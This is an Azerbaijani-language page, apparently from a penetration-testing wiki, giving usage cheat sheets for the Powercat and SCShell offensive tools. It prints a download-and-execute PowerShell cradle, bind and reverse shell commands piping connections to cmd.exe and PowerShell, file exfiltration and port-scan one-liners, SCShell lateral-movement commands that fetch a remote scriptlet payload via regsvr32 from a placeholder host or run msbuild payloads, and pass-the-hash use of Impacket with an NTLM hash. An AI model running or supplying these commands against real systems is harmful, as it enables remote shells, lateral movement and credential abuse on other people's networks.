Useful Tools

Powercat

"PowerCat" PowerShell əsaslı şəbəkə alətidir. Bu alət TCP və UDP əlaqələrini yaratmaq, dinləmək və idarə etmək üçün PowerShell skriptlərindən istifadə edir.

Yükləmək üçün bu keçiddən istifadə edin.

Powercat powershell funksiyasıdır. Bu aləti istifadə etmək üçün əvvəlcə onu cari sessiyaya yükləməliyik. Aşağıdakı əmrlərdən istifadə edərək powercat'i cari sessiyaya yükləmək mümkündür:

# Funksiyanı endirilmiş .ps1 faylından yükləyir:
    . .\powercat.ps1
# Funksiyanı verilmiş URL'dən yükləyir:
    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parametrlər:

-l      Əlaqə üçün dinləyir.                                  [Switch]
-c      Dinləyiciyə qoşulur.                                  [String]
-p      Dinlənilən və ya əlaqə qurulacaq port.                [String]
-e      Execute.                                              [String]
-ep     Execute Powershell.                                   [Switch]
-r      Relay. Format: "-r tcp:10.1.1.1:443"                  [String]
-u      Məlumatı UDP üzərindən transfer edir.                 [Switch]
-dns    Məlumatı dns (dnscat2) üzərindən transfer edir.       [String]
-dnsft  DNS Failure Threshold.                                [int32]
-t      Timeout parametri. Default: 60                        [int32]
-i      Input: Filepath (string), byte array, or string.      [object]
-o      Console Output Type: "Host", "Bytes", or "String"     [String]
-of     Output fayl yolu(path).                               [String]
-d      Qoşulduqdan sonra əlaqəni kəsir.                      [Switch]
-rep    Repeater. Əlaqə kəsildikdən sonra yeniləyə bilir.     [Switch]
-g      Payload yaradır.                                      [Switch]
-ge     Encode olunmuş payload yaradır.                       [Switch]
-h      Kömək mesajını çap edir.                              [Switch]

Əlaqənin qurulması

# Verilmiş İP ünvanına və porta qoşulmaq üçün
    powercat -c <ip> -p <port-nömrəsi>
# 8000 portunda əlaqə üçün dinləyir:
    powercat -l -p 8000
# Birinci əmrin eynisidir,sadəcə binary formatında output faylı verir:
    powercat -c <ip> -p <port-nömrəsi> -o Bytes

Shells

Powercat shell göndərmək və shell kimi xidmət etmək üçün istifadə edilə bilər.

# Bu əmr göstərilən port nömrəsndə dinləyir və daxil olan əlaqələri cmd'ə (cmd.exe) yönləndirir.
    powercat -l -p <port-nömrəsi> -e cmd
# Bu əmr göstərilən ip ünvanı ilə verilən port ilə əlaqə qurur və daxil olan əlaqələri cmd'ə (cmd.exe) yönləndirir.
    powercat -c <ip> -p <port-nömrəsi> -e cmd
# Bu əmr göstərilən port nömrəsndə dinləyir və daxil olan əlaqələri PowerShell'ə (-ep) yönləndirir.
    powercat -l -p <port-nömrəsi> -ep

Fayl Transferi

Powercat faylları -i (Input) və -of (Output fayl) parametrlərindən istifadə edərək faylları göndərir və qəbul edir.

# Fayl göndərmək üçün:
    powercat -c <ip> -p <port-nömrəsi> -i C:\inputfile
# Faylı qəbul etmək üçün:
    powercat -l -p 8000 -of C:\inputfile

Misc İstifadəsi

Powercat, port skanları həyata keçirmək,davamlı (persistent) serverlər başlatmaq üçün istifadə edilə bilər.

# TCP port skanı:
    (21,22,80,443) | % {powercat -c <port-nömrəsi> -p $_ -t 1 -Verbose -d}
# Fayllar üçün persistent server başladır:
    powercat -l -p <port-nömrəsi> -i C:\inputfile -rep
# Bu PowerShell əmri input fayllarının məzmununu oxuyur (C:\inputfile), ForEach-Object-dən istifadə edərək hər sətri 2-yə vurur və nəticəni çıxış faylına (C:\outputfile) əlavə edir.

SCShell

SCShell, əmrləri yerinə yetirmək üçün ChangeServiceConfigA 'dan istifadə edən faylsız yanal hərəkət alətidir. Bu alətin gözəlliyi ondadır ki, o, SMB'ə qarşı autentifikasiya həyata keçirmir, hər şey DCERPC üzərindən həyata keçirilir. SCShell hər hansı bir xidmətdən qeydiyyatdan keçmədən, uzaqdan istifadə edilə bilər.

Yükləmək üçün bu keçiddən istifadə edin.

İstifadəsi:

# Rmote execution
SCShell.exe <ip> XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password

və ya msbuild payloadından istifadə edə bilərsiniz:

SCShell.exe <ip> XblAuthManager "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator Password

# Verilmiş ip ünvanına qoşulmağa çalışır
# İstifadəçi adı LogonUserA'ı çağırmaq üçün istifadə olunur
# SC_HANDLE Manager 0x009ED250
# XblAuthManager'i açır (Xbox Accessory Management Service)
# SC_HANDLE Service 0x009ED1B0
# Servisin yolu (path) bu dəyərə dəyişdirilir  C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj
# Servis başladılır

Passing the Hash

scshell.py SCShell'in python2 və 3 tətbiqidir. İmpacket layihəsindən istifadə edərək, hash ilə yanal hərəkət yerinə yetirilə bilər.

Impacket Yüklənməsi:

pip install impacket

İmpacket kitabxanası şəbəkə protokolları ilə işləmək üçün Pythonda olan siniflər toplusudur.

İstifadəsi:

python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Command need to use FULL path. No command output.
SCShell>

Bu əmr, istifadəçi etimadnaməsi və NTLM hash ilə autentifikasiya edərək, xidmətlə əlaqəli əmrlər icra etmək üçün interaktiv "SCShell>" əldə edir.

SCShell haqqında daha çox məlumat toplamaq üçün bu keçiddən istifadə edin.

PreviousURL File AttacksNextDomain Privilege Escalation

Last updated